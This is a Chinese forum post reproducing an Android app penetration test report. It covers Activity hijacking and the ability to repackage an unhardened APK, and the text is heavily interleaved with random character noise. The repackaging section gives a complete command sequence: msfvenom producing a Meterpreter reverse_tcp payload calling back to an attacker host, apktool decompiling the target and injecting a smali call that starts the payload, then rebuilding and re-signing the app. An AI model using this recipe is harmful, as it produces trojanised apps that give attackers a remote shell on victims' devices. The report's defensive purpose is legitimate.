原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

admin · 发表于 2022-6-8 20:32:44

$ s$ W( h8 B% u/ S" L7 ?( K4 ~% n5 r" \& ?" x
1 M6 Q ^; A; d+ f) x ; z5 \9 o2 |. W& d; W5 a

0 h- Z; N2 V5 u7 x5 C: f 3 x/ a9 @" k/ y$ a6 t+ ` 文档编号： - ^* W# i( K' Q8 G, {0 M 5 o+ D* c' ]" A

* S/ x$ X+ L9 ~/ d3 X 6 B8 T0 e8 i v( @ \. ^ $ Y& D! A4 s- w& B) ]8 U 8 Z$ d0 z' L2 B: ~' S

. Y Z& z+ W' }. }% B: t1 |& U; e. q( \4 a, F. g" K 1 H0 ]/ C% g9 ]+ G$ B- Y) C; l# ?: `& Z3 a+ Y& ]+ f7 X8 B' R

1 d5 {# @3 A s- b' h9 B1 Y 2 t6 X6 M9 w. p: w8 L" y) J 1 r g# i% z; b$ A* z$ y $ P% v- x/ V) r" `

) A! R# E5 b$ {* N 5 _, g7 V$ _8 I* v, q" ^$ R # ^# j [# \8 ^3 L) s% k/ ` 1 E8 [5 [' Z. R4 L- H% \- z+ t

( } a5 G3 U6 i, ?7 ~ 5 d6 d7 N+ U1 Q ! |) m. C9 Y4 m$ c/ A/ l . h* D! I; k0 ~& {; w: E

, J6 ^! }& T' E2 _0 g. j0 n# @5 D$ p 某某某APP渗透测试 ( U9 i+ c( X/ F3 a' C& ] $ p: z; V3 h- w" w6 O' E. j

Q0 P8 v5 k- I: x8 t9 q! h 9 J! i6 k3 s' Z* F8 \! V2 q+ v ( L: P9 a4 ]) ?9 E. a, x / r, `; V- _. z, p3 m) j

1 H' Y3 ]& L) s" m/ T* p+ @7 E# d( |1 z, C1 k$ w & E; u$ ^; \2 H# A" C! M9 R . U y. o- z H. i \

% G$ \% u t5 o4 y* q/ S' I' D. l! d0 u. ^1 j+ j * y2 `( h, W" Q: k 6 f' V3 S; t7 d9 j+ H

7 [2 f7 U7 E/ N" f, k. Q1 x+ A$ F. |6 k; W3 I* N, ] 1 n+ a3 C+ @8 b$ u& f/ w1 @- l7 C0 q

% S# H n5 m0 r- ? : a; F v! @" V& V% Y% S 技术报告 + H: N5 {8 S# C4 N/ T; u % I( c1 A& l2 b$ k, m% Y

, `. t. \4 }+ I8 b q$ }' k3 a6 I7 c; O " c) K0 f& ^# u8 m9 d% d% [ , Z: K( y4 k5 e# E

0 u4 T% d2 j+ _' M% E4 U N: n, E0 x; H! W2 _ . }& Q+ O6 I6 f Q 8 a" x5 R# ~5 r4 S

! e: Q$ R# G! w2 @+ T 6 i$ Z. [7 b0 o7 R7 Q0 a! R 8 W; [# _1 M# a; o! R . O8 t8 I. Q- Z! b7 k4 m5 z

! p5 y9 T7 y2 D8 ~9 | ' J) Y4 D. ?. X/ a9 K$ _ ! A. @+ K3 G: h . m: ?7 F6 Y: R% h

* t6 Q& n1 ~, ?! e. e7 T5 w1 ]$ z" O/ m0 u6 K/ Y& t ' d/ B1 O. n/ |# I w' o 9 t# y9 U& e5 _5 m& v0 K m

$ s' y& U/ A/ I k2 `2 c3 }7 E6 s1 Q9 H- p3 {/ w! q 9 m: i6 S" H) z' _ f2 Z% q) k5 [2 ~: G% }

' |* g u# A; R* v, O; \ h & ^& w. v g. p6 E- @. d ' F/ Z( U V7 i, V7 K" x . J2 `! d& o# z) Z. b1 D g

# B0 m$ w7 G% w# x1 J: I; h" g# z. {! W4 w * G# f; g, U8 h; }! j 5 U' U% B) T& A; G9 h. r! E3 K

) }2 X' |( t8 I/ R* L5 }6 i6 I. y1 Z) O$ I6 O 3 U- D; M2 m5 Q ; z+ W( k, e4 R

" U, w. U* x8 d' e 3 E- F- n" r, [6 R0 z " W4 L7 v; c5 _8 B; y& l$ ?. W% r 2 O4 M4 |& F( q+ Z9 R. T( _

6 v, l [2 H+ n* u% X2 x% I( b $ l5 J( R2 ?6 V 0 N% V, i2 P9 _! F( @: u; n5 \. j$ Y3 G( D1 @

( @8 I3 @" @4 R4 d4 d n9 G* ?: }$ P, } ( ~, H$ P: D4 P [: K- b. }$ p8 l* c. `6 F) X0 n

: V/ o. R) m' s3 t7 x 4 _$ a8 z: o3 u$ G 2 W0 B! z/ J }4 c% ?5 d % q+ H; V6 W, S6 q

1 g& u4 a8 w6 y4 i2 Q( M3 J( g # m% u+ {7 P ?# A* }- ^4 \* a" ~2 { 9 E* p/ {9 Y% V8 U$ @5 T4 R: Y% K' z; _+ ` i6 M# d

* K* m9 r8 A2 M( _+ d : m' i& E' n, E: O$ `9 } 9 g. ~4 a9 ~! |) [4 @( y' h2 @% P+ p3 \9 X

- @/ |! u* q( ?. T: j * w" U7 A3 K8 @ - U1 Q' i* W. ^! w/ q5 O& d! T* [0 K" {

# g* y, @4 f' i$ N% H, b9 d2 q ) R9 ~: @+ x/ N8 J, L- S 6 z$ w# Z4 ~* X/ G. ~9 O1 ~ \; \* y1 P; p6 s& B

1 R; E; m, d" ]* p K 2 }" q0 b% N o ) @- v& v, G) K- V- J 7 p% v- q" i8 w+ x& u- h8 ~

3 k }6 a- H7 y2 J C) ?- j7 N) y; A0 f. Z8 y- p/ ~/ Q 二〇二〇年 $ z: y8 D7 @4 l$ E7 ? {/ F0 U% L ) s P( j$ j- W2 _7 W, j

4 N, m% H1 q% k# F2 q 3 T2 u- J; ^8 g( i# T 目录 8 w* J7 D# p) H9 r1 Q) V) h1 M3 J ' q3 B+ K6 ~9 l' S# J" k( s

) q+ m& N6 e4 t3 i: Y {4 m: F' U& |; s( B5 X& P 7 g1 ^! S# {+ c0 K/ A: X6 [/ p # v t% H$ j4 N' A% _- E6 r3 z a

5 z: W$ _8 B) N H5 E" l- \- f; ^* k; G; M' d8 C3 i; | 1 概述... 3 ( ]1 e2 {( H' c! A z0 v' Z' y4 _) C& _/ J" }: x5 S$ p/ `/ V

: n) s8 i% R8 x& M1 d3 q$ x7 p6 v) L ) _, F. U% [: P! X7 p 1.2测试时间... 3 # Y* ^0 D7 |) p' }$ T 2 Q' c. y/ ~, i, M' K5 z; v

# y" F$ C! _ y 1 B" V5 w; A2 X6 c 1.3测试对象... 3 / I+ X8 n" m$ o r " z6 {# f9 \: E5 U y

. ^# G" S3 g" x3 Q! J# F+ J; y% X 5 U e; s# y5 a$ } 1.4测试结果... 3 , W1 W, x6 n) z) \4 _4 a: V# d# c/ @4 p9 W& ]5 I+ m

) {# G3 Y) d$ p/ I 8 [: S p8 a1 ^* t4 E" e, M 2 检测结果... 4 8 t6 ~8 w: ]1 B. F4 R! q% X4 [+ S8 v9 D$ R$ X* K0 u- n

! D' V1 f8 y5 r8 M2 J* c! V( J/ c: U7 O 2.1 某某某... 4 0 j. `7 t* l+ d , W# y! p* O3 v" `! J: P

' N5 h# I9 q. k4 t5 j1 G' l8 R4 J 9 b* ?% ^9 s+ U2 A: t' x 2.1.1检测目标... 4 3 _$ C+ Y5 |; D. m" c0 d6 b2 s; n$ v4 L0 Z2 G/ ?5 H5 ^

u1 `- f5 |2 I( O8 V, k/ A+ m% h) c 2.1.2检测结果... 4 1 X8 o9 z$ f+ P) g * q {( u8 u# A. c% R

- h! O& r9 q( A8 ?+ ]6 {6 L3 [" E 3 D- O6 G5 O3 \ 2.1.2.1. 4 5 G, Y) |: C. r* q' l8 d) \ ( w" `& U% L% n: V, O. f: S, E t( ^

: J6 B8 M7 H4 L: \0 A1 k / c0 R* {" i1 D 2.1.2.2. 6 2 \8 h# I' \% C3 t # z# N# n4 `" y. W+ N6 l7 o

/ j5 J! c% [' K( ? I; w3 ]- X% ^ : ^. b* A- ]9 t) v # W4 E! r) G! h+ D& h % s" |5 T' ~& ^3 }

5 X8 T( L* k, R8 f2 T. I/ A% B* Q+ r7 M3 H8 X6 @. o% T. ] 1 概述 % F G5 G3 _' U% q% ~ 3 P; f! B1 `1 M

$ U1 J% e; s, ~: g* N+ y2 N# e( j2 A1 v0 ` 1.2测试时间 3 S f8 |9 v+ i! }+ b) } 3 M* e" U# @" \1 i

0 R% {/ C( t& _ _" o3 f( o 2 N7 e1 R1 H }3 U + \ z. c6 r( E# O } 6 U% V+ l" m2 e1 [ 渗透测试时间 5 s* e! b4 k8 F- H: W1 D K6 e0 O, `4 [! o 0 n7 o/ U3 _' X% z; n) \|) ^- l # r& v# O {( t0 I# F3 ?
; d9 e7 }. V5 N0 v' }8 w! u ' q* t3 p5 m% V# l : J( B' \* s% H0 \2 ?4 P , q4 {) A; u1 C 起始时间 # i2 }7 k' u3 M+ V+ F1 I 6 b/ S2 m' y9 v" ?# j5 y 8 `2 t# U5 X* s' s; v6 a2 m 4 Z& @: a6 b; x& I3 l; S5 F	6 O' F: }, ]% j% \|" V! {4 p. H( B% B* C9 n; ]# J 1 a5 H: }6 I t p ' w- j$ N. N1 t7 j3 _ 2020年4月6日 7 b! v! Z: n* @" V1 M u& T : `9 c; \. v# X% u 6 V& t3 e: t) `4 [0 k1 G ! ?' X$ [: p: u- X; J3 K" [, K x# x
6 B8 S2 g8 V2 X- Y* L+ l ; {" f/ s* ^+ e% P0 x) z5 \|, `# x 3 _0 R \|0 \|4 [( y1 e+ @0 Z% [% [- o 结束时间 1 z" W# q0 s- n+ b. _$ m# X* B" G* o L z3 e: x: s ~ ) A! c* i2 N1 ` V* w3 ^1 \|! P: m	' v5 s9 Q9 R! a6 \ 7 u8 f# r0 {: J8 z % Q3 v) Y* ]7 r2 j7 b0 U , \|6 L: }* n* R& W 2020年4月9日 3 S2 g8 N, p9 [; _% v1 R $ } T5 d% l, {) b& a! g7 k' f ! V* B# M% C# J9 L( W6 n* f 4 \|, a8 Q" z( n. m0 _' ?

' t/ X: A6 N0 T+ C' j 4 T: ]8 T2 B8 v4 @ ] 1.3测试对象 , ]: W# `3 W* A% l1 d 3 u+ F& I& ^, t1 L

4 Q& d' S8 q) H # z0 g- L- U9 l 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： # ^& q! {6 }( j$ V& G7 {& Q3 a1 H. W. C; @8 F0 A- Z

& d# M0 G/ `( F+ u+ R 4 K* e, F- m" d1 u( E5 a3 P8 r* k- o 表1-1 检测对象 / J h( e* d) D2 w6 n& \$ @ : ~5 L0 B2 |8 |6 Y

5 y) W7 \|! g8 C& \|: s% ?; s2 q- c2 t, y8 E5 L0 P% b; m: e7 c 3 ^, b/ b! a3 H ' e: G9 Y/ x) k 序号 ! Z/ x; q1 S7 _; f6 O E% W% B6 \2 X0 q2 ?$ j r8 O1 W 5 L% ]. J$ F" G3 l1 \|6 A4 S4 ^7 v9 F5 i, _; @. x- N2 w' m1 n	: V3 g* C; u# U: \|' A4 @/ ~) V , b/ K& @( G) e: E( C* s ) a/ ]3 b" L2 l% R% G% \|6 L* J # d: c9 o& e; b- O2 i" {" y \| 测试对象 - A; B f- \|! _. U9 b " \|9 l- c: \|/ P; \# X% A1 w 4 F: w0 f: q: D# ? O# e 3 Y6 ?' P# N- s* U; @9 c	: [' N" e9 L* Q4 r& f% f# \3 ^3 y! ] n$ o 3 _* {6 W1 Q }* h! h . Y# W% X6 l& l) n: c 测试地址 1 d }) \. j, d4 u4 n+ y8 I3 H9 H) l& f* d : p" h$ \6 b6 d5 _% Q& U 3 N' H: ]- {' Q3 ~9 w	; p6 j) Z Y. D8 X8 Y; ]: V8 K1 z9 ] k 6 G6 L7 l2 a: L S7 F' q" b* h4 w* ~8 r& o2 ~ B# ]9 [ 安全漏洞 ' S8 N( c2 }! k, Z 1 w( J4 f8 X3 F5 y 3 o H u- e( [8 @5 O ( B4 c- {: F. S: q" B( \|8 T D/ G
; R+ D# W2 u- M+ U- r/ A; l 3 k$ T$ O" w; f6 K, n ) ~% \|' [0 A+ e b: x8 O) H/ H) J4 y 1 * F/ Y" s! l; x$ v' r ~' b! S1 s % k/ y& u6 ~3 `/ w3 h/ R ; T: t, D& k1 r* f! b% V l1 C/ P ; R2 k9 d3 X$ l9 j8 g	3 U0 {: m3 B8 r, M- U8 \| 8 I( Y6 R/ w6 j0 i0 z c4 f) O % c/ V6 }! P/ O/ ~7 ~9 {% `6 i/ @8 X# K0 S3 F& m# H' @! N& k 某某某安卓APP ( B3 [& D1 C" ]8 r $ M2 k: ~# O; i- y# P $ c- U: r3 ^8 S# o) a! r& _ # Z! _: a6 w0 i' S( c0 s; i	9 A! j1 B! g- M& \3 C8 o: Z% G; E' b" Y8 F9 K . Z U, C/ b @+ G* N- d/ w : D$ a; v9 V( x& r ~ ! X! m* s' H/ r " l2 N8 I8 O. ]7 R) G + E. \|. c) d* y$ N 5 K# q' Q: ?. @; U) J: M; l. ~	9 ?2 m/ h5 R n% u" ~4 m* ? ( a. e6 P# K) T/ h o( h 3 p9 X2 X( _: }7 O 3 u7 O& i4 K( D4 J' w* r 2 8 a* D/ G, N' L7 Q0 N Q# m* ?; t% b7 H- x6 w$ R E, f; Z; r. l9 ^

: { l8 j( M" ]; _ V0 r3 L; j + z. U; {) q% U1 [; E: R8 J 1.4测试结果 1 x! ]2 b/ U3 e7 d# b# S: s - u9 r( [1 q; M% i( S1 K6 m+ M

/ s% D: {5 D0 s4 R6 i! Z9 a1 c, |# t. ~6 | k* `. W 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： " H# j2 Q+ r( o# \3 `* f : f, D8 s: T' p4 Y. ]" C

3 }# z* z, I0 ~! }1 w- @5 J) F4 f V% I& K4 ~! \8 l% [3 U" X ( o; [* F2 l4 `% ~" W/ ~ Y6 D9 g + w9 n' ]. d- H/ `! j3 W8 [& N/ O

, D% ~3 ~8 X+ v9 ~' F3 v # J/ d b: v3 x2 w1 S, S- q 序号 ' U& a3 \3 @3 e- H j- \ ' @* D" e' a5 q9 N% R) `

/ |2 Z- M, A( _% m3 b + u0 y+ }' T( z5 E1 ~9 } 系统名称 5 C- K1 U) X! ^) X. D7 W ; z- e' a- m3 o0 |" ~. `9 w

6 E3 D) g. {( T$ m, t ) J3 ^8 {0 E. H) [4 V& ^4 a 漏洞名称 . D4 N' C, s* e+ \: [; e# D9 n% {2 v

' S: X3 ~( l; E+ j' J" D# P 1 n& b' P9 F+ {! G" U/ ^ 漏洞危害 / u8 G4 R8 q3 g$ R+ E2 [9 m8 F" p* G* s3 Y( T- m& y( U) O

: V5 D( l9 @8 {! A $ _5 a( g' z1 h+ K. ] 修复结果 " Z3 H4 N) c1 `7 J5 E, o # ]5 d$ @4 k$ f0 h5 p) V

! c0 x1 c) }8 f* V, E0 y' z: K # U% a/ t0 p+ K0 H 1 / U r/ V6 ^( M ! V1 h* s" [5 `

/ d" ~) X; |' G# K+ h/ e5 Z 2 R! y0 W, U: J3 C1 x1 ]) u 某某某某某某APP 6 x4 V U; J$ u, r2 Z- h* ?+ p' |0 |( b# r$ _

" P, A* s4 M+ Y( X$ {/ @2 P 5 c- L( g0 a; T: Z0 N& B Activity 劫持 ' n0 S1 o( r2 {+ R) O) {, R; n 7 U x# X9 h/ `* P+ ]

5 v; n& l& t' p4 ^* g + d/ N, ]( t2 u* h1 K7 S 3 d1 [3 f8 h [9 L8 u. Q2 ` K# h' |, h! B' `9 k

% R1 d8 h6 C- }7 \- s) x: Q. r; H : I: {- f; E7 @) ?' ~( N; @ 高 4 `1 S r- F( L ) o- p+ `; v% R2 Y# _/ y+ g

5 k' H& ~4 g! U, }' D* F/ E) Z2 | ' h( w- W3 G6 b2 D0 b1 z$ q2 B: [ + @. Y; u) U; ? S$ ^7 s0 u 3 M% A: B+ H3 ^5 D( [0 ], `! {

# S/ @$ ]3 m7 L 1 K( |7 `+ { ~ 2 % D) h( y- t; }7 h! o: E( }' b5 L + F" o2 \3 W3 R2 Y

! k. ?% m, x1 }8 m7 J$ K# k* b+ f7 k# P: }) S. y( k9 M 某某某某某某APP 0 [- C* R+ N' x" v9 B : G! B' R: y. \) f! B

. D7 |: N1 N! Y" { ! |& F8 z' ?+ ~4 t; Z 反编译二次打包捆绑木马、篡改APP代码 , b) Y4 n& [1 N. L/ _+ f: e ' M9 h0 l* Y6 c# E: r/ ~

" `# J" A2 y5 w$ d9 X D$ P1 C ( O+ ] E. w% q 高 ' v) l+ n) U) b0 S9 A% h8 o- L2 s+ g7 k7 f) V* a* @/ q

6 |5 w9 H( t' q: ?+ } ( b6 J1 j5 ~5 H * a1 v, H0 B# `3 X$ n9 T4 [ E2 p4 p / V6 U% e# X4 \7 D

+ c! p' J. a) k4 c8 J6 w+ w# q: R + T C/ T( r# Z* N* p, v/ ~ # S) F8 K% H, K# J& p- o g( g8 V, E1 p: ]

4 U& w3 S5 ^3 J! G0 v4 } , L5 K3 a G6 r3 v. K0 {( \ 表1-2 测试结果 0 g0 D8 f4 h" A: w2 \6 D9 o - C8 Q! Q5 s* z+ e% ~2 C8 j

8 h0 h* C. ~& v, j& ` ' W' |; l2 G# W' {+ h* s; y U n7 z8 z" J3 j! X1 c; m V! g0 d - P/ y/ v2 A4 h* k4 t1 X9 g

e" ?9 T. K! Y, o/ g+ ]; S$ H h8 C% \. I- Y 2 检测结果 3 [& W- I" k1 K# p1 N 0 e; g4 c2 O1 f' y8 R* B" k# ~4 ~

1 J I( L. Z9 t; V" `8 F2 C6 G' q& m/ T: T% ~ 2.1 某某某 $ d- w$ a8 q% E7 N+ O ( h1 X5 W% b' A3 s L# t

3 P) r5 m: G, U+ o8 U6 e# }$ D ) ?3 J4 l1 s+ z$ \; d+ \ U 2.1.1检测目标 / ?. i8 |6 z& E& z" ^ " \7 L: c; E! J0 |- G. Y4 |1 i! J

n. N/ Q9 h* |3 ~& W 4 G6 M7 j. S4 [/ A E 目标地址： 某某某某某某APP ; J* E/ s8 i2 h% }. J- f T$ t

' u; x6 P0 ]) ~. Q$ L, W) X( u( O1 ~7 x- x 2.1.2检测结果 2 j2 g, t+ g- _1 j* H2 X: k: ` - z, g( d; U, W' Z8 l: h% I: ~

0 f2 h6 j# _( j/ ^ 3 z7 v" _- g1 j( G 2.1.2.1 2 m$ \. @& |2 v K ( ~, [ O% e1 e2 M0 X7 \- f

6 [# R. A% ?+ }3 X. w, ~4 V& o& o3 ]: Y) M5 ~/ ]- V% i3 z 漏洞链接地址：某某某某某某APP : F" l; ^5 `# [( u- q / S* s1 ^! F9 D. ^( ~0 _

, K4 q: }: i& y# R# x% I1 ~' L 5 X1 [. X' x. q* F( b, W * A T5 s5 \, N8 P5 w" I7 K . m# M# F1 C& a9 _

- z) _+ \7 s6 F- F0 S 0 w8 b( l1 l3 E1 \, @ 漏洞分析及取证： 6 l, Y1 I: z3 }& |8 y2 W: j" Y5 n3 l

2 Y) ~, f% H$ u h$ s* E- {5 G , t1 Z' d/ u' _+ C H6 D2 L7 c 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： 4 {) M5 {: l% S3 s! r ( v* ?9 W" [5 u; s2 R& u

7 L+ i' l) O3 ? g1 f! y+ D4 w0 v/ J& P o8 x9 ]' z1 x4 E1 W 0 {0 S3 T3 P* O$ V! _( D2 y * c0 K Z9 D% b4 {% ^

7 h. e9 X2 O3 z$ j$ f. T+ w + G8 Z* R/ R7 A* u% K, ^ 9 V( G6 v* I3 U5 [8 w7 b* p G3 ^ # y9 {3 `9 a Q9 N( o" r

3 |" C0 y9 W0 f! q/ [% [ # Y) F0 x0 F5 |8 b 3 [% L* J8 U" M0 w- {' l 4 X7 k0 T. i7 ]" |3 u* n

5 p# @" s' X& f2 S/ }4 L 9 G7 Q( T" ]2 Y$ [2 ] ! w1 ^: s* R% {# O, x5 G0 T 7 m; o% H2 K9 U: g2 {3 K1 i

5 t8 \5 [% t1 {9 b& B3 H: U! `/ g9 e% W ! ^& u, H4 T; x % W" W( W0 J6 b! e( |" j7 b. q

" {8 M2 T+ g; L/ e. u! ] 3 I; l: L p) @6 a9 r 漏洞危害：高 1 D. e) G( ?6 i, d( ?1 h 5 \0 }" ]. o8 } y' T

5 `# i! \9 Z; t/ K7 } + n& o! p6 \, w" H2 I3 q1 \ ) b4 U% T8 V0 x: Y" h% f g" W0 e , e, N' \|2 \# s 严重程度 8 ^' _4 E3 ]8 A( D ) Y% ^( B6 n9 n( W0 Y2 I * W: S( V6 ~, l4 T) m; L% F( k. V0 H1 A9 _' r1 ~	4 i: Z8 \|, I$ q- Q" a4 Z# x/ V & J( {) {/ x1 c$ c' ?7 a' \ y ( y2 R& \7 G' \$ M. _+ T; E1 C2 c6 d. }' }6 i+ a" r# p* T# c 高 ( N. g' @$ C; h - X; C3 r h6 f, w* _6 h ) P8 b3 `4 F ? 5 T) Y+ ^, a' N0 r' X1 W4 ?: w8 v! ^0 B	* C1 d$ U* t( f5 a) ~, n) X 8 b' w( ?' c1 h" m . ?4 I8 ~8 r" J4 V/ ~ + V) B9 K& p% {4 W ■ k. O5 K- v- @* [, a4 _) m/ U 9 w/ f+ ^8 P# V B# ^- V- l - H( p9 n" k4 v# f5 n " R! C6 ^* M& K$ [: _' t/ \	* @/ B# A* g& m( H; [ / E0 }! Y: M. {, ?+ u& p. z5 h* O " y/ b; w6 [, f$ y1 i7 i : }2 y* i# m% h$ Z& c. z) s 中 5 D# M3 {, C+ K5 X ; p8 k: u" O; \|9 d3 J ' y3 \* A. m3 D" F# ?2 V + t( K, R9 x6 T	! T, D0 N O: [# n1 z5 F& N8 S* [+ ?* [" m8 w f$ R9 a% i ! R) ^( F3 ?& P0 p* Q) {3 E ; F& U' a" n: U3 a7 l* ]; P( {- F$ s T 4 f. O( n# B& q: R 9 M( G- P/ c+ {: z$ T! x! J 2 r0 G+ y0 G" Z/ i U ( L* G/ D" S, \% ^5 }	4 {5 d% w% ~+ }$ b% H+ k7 k0 j 0 f6 O0 \+ M( C7 w/ v V ; A/ F! f, G7 ~! {$ ~4 c. a3 R! `5 d9 h2 q9 e9 @- a 低 7 d4 v2 h& g0 e& p/ H / M+ e$ t* \|# J7 S3 L& s/ r7 ^ * o: }9 ~3 m" l3 D$ F# \|% r8 n6 _8 ^	\|8 v$ s$ I* w* G9 N5 `2 G- T # l$ K. \! M; g- h $ W- B# j7 U$ \|) \| * P H4 t' U/ V- }; ?# o 2 \|0 B0 e8 q0 z/ S+ f# P , D, i3 Y6 y% h9 s5 E7 x& _6 c* X: L0 U , F! U4 S- ]1 ]9 z. a/ ]9 m7 c) u% B ! x d- f' A& \6 D+ y; y3 o

( [# Z+ O( q! o- q8 f/ { ' r8 w4 w* \' ^3 m) \ + ?$ `- E) O/ q6 T+ i8 I+ Z9 X5 ]! D) @1 o+ J% H: Y

* K0 F) X1 t D3 f3 J, C 2 E1 h5 K% _5 Z6 M5 \3 i 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 3 u; B5 }6 [' M , P0 @8 Z) |2 d

- Y5 H. Z6 e M1 n' r( w ! Q( @" D7 s# n" @8 \ ) j e/ M6 X+ \: E$ ?$ J7 m" T, d9 P' o

# [; ?# z$ m; B 0 ? s0 Y5 X" V$ s2 k( z- n( }3 ? ( J6 @% d/ p0 {9 W; b4 d O8 Q6 a7 _3 [! N5 ]% f2 F

, }4 p6 J6 S; i% L + |: u5 R# C ?: R 2.1.2.2 8 w6 H/ D( p5 H$ w 6 M ^4 G, N' S& D% b3 D7 A* S( [

6 i; c; |) N1 h; L# a9 Z 4 s- y, Q2 s8 }8 _5 [ 漏洞链接地址：某某某某某某APP , c5 F7 H- i( m1 `3 s ( q7 C0 @4 ^7 R: ^& o( X6 c

7 q2 j" ~$ P" Z0 t9 ~8 U * B5 e3 ~6 t B' d( F 漏洞分析及取证： 3 P0 q9 S# g$ N0 I3 d- }, f % v* ^# a7 \+ H7 X

8 B. U# z/ T* q- ]+ V: Q/ O/ J3 F E7 c1 d, E, j0 M4 T 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： 6 K$ E! X1 {. L% G 3 ]# p% ^' d+ } I/ M

5 S9 v& b" h! w, l8 F$ ]; R5 A + c5 ~" g2 f4 K3 m% K m 用Metasploit 生成木马 apk * C% t2 U* ?4 I+ B3 O% A- r 1 m6 c0 c7 y; X; ] q

; ?: W% r% Q+ C8 O$ Z8 n* s! `% k( h% Q. v* K msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk ( |/ L0 d4 N* O6 U f 6 Q$ S5 }: a; e( c3 ]. j0 }

( @1 c( q& }- V3 ^ 3 _/ S* a5 M, i 反编译目标apk和木马apk 3 E0 |' `% {0 |" i2 N ; h$ J! W- i" K

7 z0 j' [& K) q. X# p $ w- l8 X. J, R3 d* v, |2 T2 y apktool d target.apk
& _# K) p! G$ x! k% z ) |, g" `. O+ x6 s- m apktool d cockhorse.apk ( j, T; c6 L, s * U( @ z1 `& m4 M N8 c$ A

$ P# |4 q- x. d q: w/ W% `: v( L7 W- j' y9 Z. s 木马 apk 注入目标 apk 3 r5 N/ ]" O7 J1 A5 Z. A# U " l* f4 m& @$ y

5 _8 a- E$ g8 J4 j) I' i " [1 Z/ b" C1 d* o 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
& m( i; p- i& I. p 5 ]" h3 K5 J- [ v, p0 E invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 3 y6 C. J! e( O) G6 Q3 E+ K + m0 U9 S8 Q& c

) ~0 _- [& v9 j1 @' y / Y1 V& c9 W7 e* U' v0 J8 X 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 ! ^ @2 q" [- ?& h ! h: G! R/ J0 f+ p* H1 l# b1 v

: v- j' z; j4 X7 q0 k$ N8 I# k7 d 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 % `3 I% Z1 R& m 2 O, \# Z* n( I7 y5 L

% z0 @! [/ W8 Y0 N, _5 X # m- D, j% Q F9 }1 Q 回编译生成最终 apk 6 N: k. l' h, k4 o; o 1 O6 _0 u( z1 R N

C' X0 f* |9 \: r& p- }( ^ & f% S0 F K4 d! q/ X 重新打包 $ [! w9 V3 M( u, V . z" D8 j4 ]: y( K; h: i

( r7 U6 R. b+ k7 k" L! U$ a- `* }& e! A5 x$ c( `, K apktool b -o repackage.apk target_app_floder 2 N- ?* c/ A) b, Q* W+ A3 w. g, O: n! v h& _: h H

: W9 b: u: w# q9 b" z ~6 ~; e- f4 e0 T8 c1 B0 g! _ 创建签名文件，有的话可忽略此步骤 : n8 }7 ^+ m k: a, k& l $ l6 E. _% z$ }

1 d$ A0 B1 A3 ^! q- ?3 } , y+ f# {* N5 L, q keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 5 s' j6 z& A( p8 c 9 V6 H+ x. N6 r1 K. L. u. Y7 \

, X" o% P( B8 u6 {; }8 a8 v# p7 G: D$ R! N+ G, p9 r1 ^$ i 签名，以下任选其一 8 g( c4 o- {- a6 L- v; j, ^: V2 P

& R: L+ O! x& ? & {- j1 S( {2 K5 C" O* _7 w" ?- f jarsigner 方式 3 t5 X m3 M# |& a! P+ m , C7 c+ c- l' D% ~

' @* c. b6 ?: r3 w* C6 z+ i. f% u- L* o jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ( d# N$ `' Q, c& w+ m 5 R. D$ O4 H! F% D- j

, T& |9 I- Q7 U$ {4 N7 x ' M4 l4 b& u( _0 H; o* E. } apksigner 方式 4 [0 p! [" C6 k* F) o ( Y4 o3 ]6 y& B6 N

; R7 I1 h6 f1 i; f l3 [ ( h: P; H6 v& X' T apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk " L) g' V2 A9 u: D+ f5 T 1 Q/ |' r' m( T9 a; `3 ^5 T T

( h+ z' g6 \" X! c - ?0 z4 W2 M7 f a6 D 如需要禁用 v2签名 添加选项--v2-signing-enabled false 1 {2 ]+ S6 U- o/ I" h+ S, T7 w$ ~ ( e; O6 v0 X! v V: y( g

& s1 Z5 t2 z( t' C. r% N8 k1 k7 g$ O9 g! L 验证，以下任选其一 4 R- X4 B) s- j- ~+ _/ ? g9 @2 r 5 e, J( z% x. H5 y) m& I" ^+ w2 [

: F! E( B! K# D3 i& w) Y1 p/ O3 u& m( f2 W& R) R8 e# Z jarsigner方式 ) ~ h" U/ d# z* P* M/ O 7 {1 b( s; P6 `) _

# h' N2 W) W' R: [7 @% J3 R- J8 c3 I/ s- D6 Q5 y$ l4 r jarsigner -verify repackaged.apk s9 Z, D9 R3 J9 w( }0 v$ }! c( F. M, Z, K

- p9 ^. a/ _( c- T+ i" C% j( f: I! W" Q' `3 w- ? apksigner 方式 7 R/ L3 o0 P+ q1 L6 b 6 }0 f$ {" X% W7 ?# ?; B4 ]* u; }

4 H5 [- u8 X' |: R+ K2 t% E! x 6 e0 z+ t y% K1 C6 [" A @ apksigner verify -v --print-certs repackaged.apk 8 e( Z! C# O" W: p- s7 X9 [% T" \0 {8 T* }- G

& {% V1 X, H/ R$ \6 @* U6 P$ d8 N W; f7 e( f- v& l: ]6 r keytool方式 9 h# [/ B& V( |8 ^& E0 y3 H5 N 8 C ]- ?5 D; H# L. E4 y% q

. ^1 n) \# {6 Y7 x, b3 l0 |* ?8 H" n2 Q. }: K( d keytool -printcert -jarfile repackaged.apk & Z1 g( |# `" O' {) M, h + M' M4 K& ]/ Z( @0 S

